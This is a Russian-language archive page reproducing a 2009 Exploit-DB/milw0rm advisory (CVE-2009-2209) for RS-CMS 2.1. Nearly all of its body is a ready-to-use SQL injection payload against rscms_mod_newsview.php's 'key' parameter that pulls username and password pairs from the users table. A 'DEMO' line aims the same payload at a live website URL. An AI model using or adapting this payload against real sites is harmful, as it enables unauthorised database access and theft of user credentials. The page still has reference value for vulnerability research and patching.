- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 9000
- Проверка EDB
-
- Пройдено
- Автор
- MR.TRO0OQY
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-2209
- Дата публикации
- 2009-06-22
Код:
=======================================================
+++++++++++++++++++ information +++++++++++++++++++++++
=======================================================
[+] Script :RS-CMS 2.1 (rscms_mod_newsview.php key) Remote SQL Injection Vulnerability
[+] Found by : Mr.tro0oqy
[+] C0ntact : t.4@windowslive.com <Yemeni ana>
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
BUGS
====
Sql Injections:
rscms_mod_newsview.php?key=-4+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15+from+users--
DEMO
====
http://www.rs-cms.com/rscms_mod_newsview.php?key=-4+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15+from+users--
=======================================================
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
=======================================================
all my Friends
# milw0rm.com [2009-06-22]- Источник
- www.exploit-db.com
